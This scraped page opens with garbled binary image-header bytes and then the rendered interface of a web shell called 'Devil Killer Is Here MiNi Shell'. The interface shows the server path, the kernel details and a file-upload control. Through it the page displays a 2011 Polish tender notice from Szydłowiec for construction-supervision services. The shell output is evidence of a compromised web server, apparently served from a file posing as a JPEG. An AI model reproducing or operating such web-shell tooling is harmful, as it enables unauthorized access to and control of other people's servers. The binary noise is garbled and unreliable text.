JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111102/286477-N-2011.html

<p class="kh_header"><b>Szydłowiec: Zadanie Nr 1 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego pn. Wykonanie  remontu i kolorystki elewacji, osuszenia murów przyziemia Ratusza w Szydłowcu oraz adaptacja balkonu wieży Ratusza z przeznaczeniem na galerię widokową
Zadanie Nr 2 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Budowa budynku Regionalnego Centrum Biblioteczno - Multimedialnego w Szydłowcu.
Zadanie Nr 3 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Rozbudowa, przebudowa i modernizacja budynku Pod Dębem w Szydłowcu</b><br>
<b>Numer ogłoszenia: 286477 - 2011; data zamieszczenia: 02.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , pl. Rynek Wielki 1, 26-500 Szydłowiec, woj. mazowieckie, tel. 048 617 86 30, faks 048 617 05 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szydlowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie Nr 1 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego pn. Wykonanie  remontu i kolorystki elewacji, osuszenia murów przyziemia Ratusza w Szydłowcu oraz adaptacja balkonu wieży Ratusza z przeznaczeniem na galerię widokową
Zadanie Nr 2 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Budowa budynku Regionalnego Centrum Biblioteczno - Multimedialnego w Szydłowcu.
Zadanie Nr 3 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Rozbudowa, przebudowa i modernizacja budynku Pod Dębem w Szydłowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego pn. Wykonanie  remontu i kolorystki elewacji, osuszenia murów przyziemia Ratusza w Szydłowcu oraz adaptacja balkonu wieży Ratusza z przeznaczeniem na galerię widokową obejmującego n/w roboty:
1. Wykonanie osuszenia murów przyziemia poprzez wykonanie przepony na wysokości min. 35 cm powyżej poziomu posadzki piwnic metodą iniekcji - izolacji odcinającej możliwość podciągania kapilarnego;
2. Remont elewacji i wykonanie kolorystyki polegający na wymianie tynków zewnętrznych z uwzględnieniem wzmocnienia ścian kotwami w miejscach pęknięć.
3. Adaptację balkonu wieży ratuszowej na platformę widokową obejmującą remont nawierzchni balkonu, wykonanie balustrady i zabezpieczenia w postaci osiatkowania.
4. Remont konstrukcji dachowej polegający na zabezpieczeniu elementów więźby środkami grzybobójczymi oraz środkami ogniochronnymi, wzmocnieniu elementów konstrukcyjnych bądź ich wymianie.
5. Remont schodów zewnętrznych - wykonanie nowych schodów.
6. Remont studzienek doświetlających okna piwniczne obejmujący ich rozbiórkę oraz odtworzenie przy użyciu nowych materiałów.
7. Wykonanie opaski wokół budynku.
8. Wykonanie obróbek blacharskich.
Na przedmiot zamówienia składa się nadzór inwestorski nad realizacją w/w zakresu rzeczowego robót, zgodnie ze specyfikacją techniczną wykonania i odbioru robót, z projektem budowlanym, z przedmiarami robót i specyfikacją istotnych warunków zamówienia na wykonanie robót budowlanych.
Funkcja inspektora nadzoru inwestorskiego pełniona będzie w branży konstrukcyjno-budowlanej wraz z nadzorem robót budowlanych na obiektach zabytkowych nieruchomych:
Do obowiązków inspektora nadzoru inwestorskiego należy pełny zakres czynności określony w art. 25 ustawy z dnia 07.07.1994 r. - Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118. z późn. zm.) oraz obowiązki zapisane w umowie, w tym:
posiadanie przez cały okres realizacji przedmiotu zamówienia ubezpieczenia z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie mniejszą niż 100.000,00 złotych; sprawdzanie i potwierdzanie obmiarów faktycznie wykonanych robót oraz powykonawczych kosztorysów sporządzanych przez wykonawcę robót budowlanych; czuwanie nad prawidłowością treści protokołów odbiorów oraz faktur sporządzanych przez Wykonawcę robót budowlanych w zakresie fakturowania robót finansowych przez jednostki współfinansujące;
sprawdzanie jakości wykonanych robót, wybudowanych wyrobów, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych, niedopuszczonych do obrotu i stosowania w budownictwie;
uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości i zakresu nadzorowanych robót;
dokonywanie odbiorów częściowych od Wykonawcy robót budowlanych;
uzgadnianie ewentualnych zmian w trakcie realizacji zadania;
organizowanie spotkań;
współpraca z kierownikiem budowy, autorem projektu oraz osobą odpowiedzialną za realizację inwestycji ze strony Zamawiającego;
opracowanie projektu protokołu odbioru robót;
bieżące rozwiązywanie problemów technicznych budowy;
współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty;
zapewnienie skutecznego nadzoru inwestorskiego, w tym pobyt na budowie minimum raz w tygodniu oraz w razie konieczności na każde wezwanie Zamawiającego nie później niż w dniu następnym od daty wezwania (w przypadku nagłej potrzeby niezwłocznie);
sprawdzanie materiałów przedodbiorowych sporządzonych przez Wykonawcę robót budowlanych, w zakresie sprawowanego nadzoru inwestorskiego;
uczestnictwo w odbiorze końcowym inwestycji oraz przekazanie Zamawiającemu wszelkich niezbędnych dokumentów związanych z odbiorem końcowym robót;
udział w przeglądach gwarancyjnych wykonanych robót;
dokonywanie wpisów w dzienniku budowy;
rozliczenie finansowe zadania (uczestnictwo w rozliczeniu rzeczowo-finansowym inwestycji), w tym przygotowanie zestawień poniesionych wydatków w formie elektronicznej.
Opis przedmiotu zamówienia zgodny z nomenklaturą Wspólnego Słownika Zamówień. CPV: 71.52.00.00-9 - Usługi nadzoru budowlanego
Wartość robót netto - 966.583,61 zł.
Zadanie Nr 2 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Budowa budynku Regionalnego Centrum Biblioteczno - Multimedialnego w Szydłowcu obejmującego n/w roboty:
1. Rozbiórkę istniejącego budynku wraz z demontażem istniejących przyłączy.
2. Wykonanie fundamentów, ścian zewnętrznych i wewnętrznych wraz z wykonaniem tynków wewnętrznych.
3. Wykonanie stropów i stropodachu.
4. Wykonanie docieplenia ścian zewnętrznych styropianem wraz z wyprawa elewacyjną cienkowarstwową.
5. Wykonanie docieplenia stropodachu styropianem oraz pokrycia dachu papą termozgrzewalną.
6. Wykonanie instalacji elektrycznej, wodno-kanalizacyjnej, centralnego ogrzewania, wentylacji nawiewno wywiewnej, klimatyzacji, wykonanie przeciwpożarowego systemu alarmowego.
7. Montaż windy, stolarki okiennej i drzwiowej, wyposażenia wewnętrznego.
8. Wykonanie zagospodarowania terenu wraz z przebudową istniejących miejsc postojowych.
9. Wykonanie przyłącza wodno - kanalizacyjnego i ciepłowniczego.
Na przedmiot zamówienia składa się nadzór inwestorski nad realizacją w/w zakresu rzeczowego robót, zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót, z projektami budowlanymi, z przedmiarami robót i specyfikacją istotnych warunków zamówienia na wykonanie robót budowlanych.
Funkcja inspektora nadzoru inwestorskiego pełniona będzie w branżach:
konstrukcyjno-budowlanej;
instalacyjno-sanitarnej w zakresie instalacji i urządzeń wodociągowych, kanalizacyjnych, centralnego ogrzewania, wentylacyjnych;
instalacyjno-elektrycznej   w   zakresie   sieci,   instalacji   i   urządzeń elektrycznych i energetycznych, instalacji i urządzeń teletechnicznych;
Do obowiązków inspektora nadzoru inwestorskiego należy pełny zakres czynności określony w art. 25 ustawy z dnia 07.07.1994 r. - Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118. z późn. zm.) oraz obowiązki zapisane w umowie, w tym:
posiadanie przez cały okres realizacji przedmiotu zamówienia ubezpieczenia z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie mniejszą niż 100.000,00 złotych;
sprawdzanie i potwierdzanie obmiarów faktycznie wykonanych robót oraz powykonawczych kosztorysów sporządzanych przez wykonawcę robót budowlanych;
czuwanie nad prawidłowością treści protokołów odbiorów oraz faktur sporządzanych przez Wykonawcę robót budowlanych w zakresie fakturowania robót finansowych przez jednostki współfinansujące;
sprawdzanie jakości wykonanych robót, wybudowanych wyrobów, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych, niedopuszczonych do obrotu i stosowania w budownictwie;
uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości i zakresu nadzorowanych robót;
kontrola zgodności dostaw instalacji i urządzeń technicznych z dokumentacją oraz uczestniczenie w przeprowadzanych próbach i odbiorach technicznych instalacji i urządzeń;
dokonywanie odbiorów częściowych od Wykonawcy robót budowlanych;
uzgadnianie ewentualnych zmian w trakcie realizacji zadania;
organizowanie spotkań;
współpraca z kierownikiem budowy, autorem projektu oraz osobą odpowiedzialną za realizację inwestycji ze strony Zamawiającego;
opracowanie projektu protokołu odbioru robót;
bieżące rozwiązywanie problemów technicznych budowy;
współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty;
zapewnienie skutecznego nadzoru inwestorskiego, w tym pobyt na budowie minimum raz w tygodniu oraz w razie konieczności na każde wezwanie Zamawiającego nie później niż w dniu następnym od daty wezwania (w przypadku nagłej potrzeby niezwłocznie);
obecność branżowych inspektorów nadzoru na każde wezwanie Inspektora nadzoru lub Zamawiającego nie później niż w dniu następnym od daty wezwania oraz w trakcie realizacji nadzorowanych przez nich robót branżowych zaplanowanych w harmonogramie rzeczowo-finansowym w zależności od potrzeby, w okresach uzgodnionych przez inspektora wiodącego z inspektorami branżowymi (w przypadku nagłej potrzeby niezwłocznie);
sprawdzanie materiałów przedodbiorowych sporządzonych przez Wykonawcę robót budowlanych, w zakresie sprawowanego nadzoru inwestorskiego;
uczestnictwo w odbiorze końcowym inwestycji oraz przekazanie Zamawiającemu wszelkich niezbędnych dokumentów związanych z odbiorem końcowym robót;
udział w przeglądach gwarancyjnych wykonanych robót;
dokonywanie wpisów w dzienniku budowy;
rozliczenie finansowe zadania (uczestnictwo w rozliczeniu rzeczowo-finansowym inwestycji), w tym przygotowanie zestawień poniesionych wydatków w formie elektronicznej.
Opis przedmiotu zamówienia zgodny z nomenklaturą Wspólnego Słownika Zamówień. CPV: 71.52.00.00-9 - Usługi nadzoru budowlanego
Wartość robót netto - 1.898.300,77 zł.
Zadanie Nr 3 - Pełnienie funkcji inspektora nadzoru dla zadania inwestycyjnego Rozbudowa, przebudowa i modernizacja budynku Pod Dębem w Szydłowcu obejmującego n/w roboty:
1. Rozbudowę istniejącego budynku.
2. Renowację istniejących murów fundamentowych poprzez usunięcie wody kapilarnej metodą iniekcji ciśnieniowej.
3. Wykonanie podbicia istniejących fundamentów wraz z izolacjami przeciwwilgociowymi z papy zgrzewalnej.
4. Naprawę uszkodzonych miejsc w ścianach.
5. Wymianę stropów oraz więźby dachowej na istniejącym budynku. 
6. Pokrycie dachów nieodeskowanych dachówką ceramiczną.
7. Montaż stolarki okiennej i drzwiowej.
8. Wykonanie instalacji elektrycznej, wodno - kanalizacyjnej, wentylacji, centralnego ogrzewania, teletechnicznej
9. Wykonanie przyłączy wodociągowego, kanalizacji sanitarnej, ciepłowniczego.
10. Przebudowę stacji transformatorowej.
11. Wykonanie zagospodarowania terenu.
Na przedmiot zamówienia składa się nadzór inwestorski nad realizacją w/w zakresu rzeczowego robót, zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót, z projektami budowlanymi, z przedmiarami robót i specyfikacją istotnych warunków zamówienia na wykonanie robót budowlanych.
Funkcja inspektora nadzoru inwestorskiego pełniona będzie w branżach:
konstrukcyjno-budowlanej wraz z nadzorem robót budowlanych na obiektach zabytkowych nieruchomych;
instalacyjno-sanitarnej w zakresie instalacji i urządzeń wodociągowych, kanalizacyjnych, centralnego ogrzewania, wentylacyjnych;
instalacyjno-elektrycznej   w   zakresie   sieci,   instalacji   i   urządzeń elektrycznych i energetycznych, instalacji i urządzeń teletechnicznych;
Do obowiązków inspektora nadzoru inwestorskiego należy pełny zakres czynności określony w art. 25 ustawy z dnia 07.07.1994 r. - Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118. z późn. zm.) oraz obowiązki zapisane w umowie, w tym:
posiadanie przez cały okres realizacji przedmiotu zamówienia ubezpieczenia z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie mniejszą niż 100.000,00 złotych;
sprawdzanie i potwierdzanie obmiarów faktycznie wykonanych robót oraz powykonawczych kosztorysów sporządzanych przez wykonawcę robót budowlanych;
czuwanie nad prawidłowością treści protokołów odbiorów oraz faktur sporządzanych przez Wykonawcę robót budowlanych w zakresie fakturowania robót finansowych przez jednostki współfinansujące;
sprawdzanie jakości wykonanych robót, wybudowanych wyrobów, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych, niedopuszczonych do obrotu i stosowania w budownictwie;
uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości i zakresu nadzorowanych robót;
kontrola zgodności dostaw instalacji i urządzeń technicznych z dokumentacją oraz uczestniczenie w przeprowadzanych próbach i odbiorach technicznych instalacji i urządzeń;
dokonywanie odbiorów częściowych od Wykonawcy robót budowlanych;
uzgadnianie ewentualnych zmian w trakcie realizacji zadania;
organizowanie spotkań;
współpraca z kierownikiem budowy, autorem projektu oraz osobą odpowiedzialną za realizację inwestycji ze strony Zamawiającego;
opracowanie projektu protokołu odbioru robót;
bieżące rozwiązywanie problemów technicznych budowy;
współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty;
zapewnienie skutecznego nadzoru inwestorskiego, w tym pobyt na budowie minimum raz w tygodniu oraz w razie konieczności na każde wezwanie Zamawiającego nie później niż w dniu następnym od daty wezwania (w przypadku nagłej potrzeby niezwłocznie);
obecność branżowych inspektorów nadzoru na każde wezwanie Inspektora nadzoru lub Zamawiającego nie później niż w dniu następnym od daty wezwania oraz w trakcie realizacji nadzorowanych przez nich robót branżowych zaplanowanych w harmonogramie rzeczowo-finansowym w zależności od potrzeby, w okresach uzgodnionych przez inspektora wiodącego z inspektorami branżowymi (w przypadku nagłej potrzeby niezwłocznie);
sprawdzanie materiałów przedodbiorowych sporządzonych przez Wykonawcę robót budowlanych, w zakresie sprawowanego nadzoru inwestorskiego;
uczestnictwo w odbiorze końcowym inwestycji oraz przekazanie Zamawiającemu wszelkich niezbędnych dokumentów związanych z odbiorem końcowym robót;
udział w przeglądach gwarancyjnych wykonanych robót;
dokonywanie wpisów w dzienniku budowy;
rozliczenie finansowe zadania (uczestnictwo w rozliczeniu rzeczowo-finansowym inwestycji), w tym przygotowanie zestawień poniesionych wydatków w formie elektronicznej.
Opis przedmiotu zamówienia zgodny z nomenklaturą Wspólnego Słownika Zamówień. CPV: 71.52.00.00-9 - Usługi nadzoru budowlanego
Wartość robót netto - 3.671.481,66 zł..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.: 
1. w przypadku zadania Nr 1 minimum jedną usługę o wartości minimum 15 000 zł brutto polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego, na obiektach kubaturowych wpisanych do rejestru zabytków;
2. w przypadku zadania Nr 2 - minimum jedną usługę o wartości minimum 30 000 zł 
brutto polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego, na obiektach kubaturowych. 
1. w przypadku zadania Nr 3  minimum jedną usługę o wartości minimum 55 000 zł brutto polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego, na obiektach kubaturowych wpisanych do rejestru zabytków;
Ocena spełniania warunków udziału w postępowaniu będzie dokonana w oparciu o złożone wraz z ofertą oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>złożą oświadczenie, że dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, sporządzone wg załączonego wzoru - (Załącznik nr  5  do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawca potwierdzi dysponowanie: 
- w przypadku zadania Nr 1 i zadania Nr 3 : osobą wyznaczoną do pełnienia funkcji inspektora nadzoru inwestorskiego posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz spełniającą warunki § 8.1 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. nr 150 poz.1579), oraz minimum dwuletnie doświadczenie zawodowe w pełnieniu funkcji na stanowisku inspektora nadzoru lub kierownika budowy na obiektach zabytkowych; 
- w przypadku zadania Nr 2: osobą wyznaczoną do pełnienia funkcji inspektora nadzoru inwestorskiego posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
przedłożą wykaz osób które będą uczestniczyć w wykonaniu zamówienia, tj. wykaże osoby, które nadzorować będą roboty:
inspektor nadzoru w branży: konstrukcyjno-budowlanej, w tym do nadzorowania robót budowlanych prowadzonych przy zabytku nieruchomym,
inspektor nadzoru w branży: instalacyjno-sanitarnej w zakresie instalacji i urządzeń wodociągowych, kanalizacyjnych, centralnego ogrzewania, wentylacyjnych,
inspektor nadzoru w branży: instalacyjno-elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych, instalacji i urządzeń teletechnicznych.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana w oparciu o złożone wraz z ofertą oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Inspektor nadzoru jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wartości ubezpieczenia na kwotę ubezpieczenia nie mniejszą niż 100.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

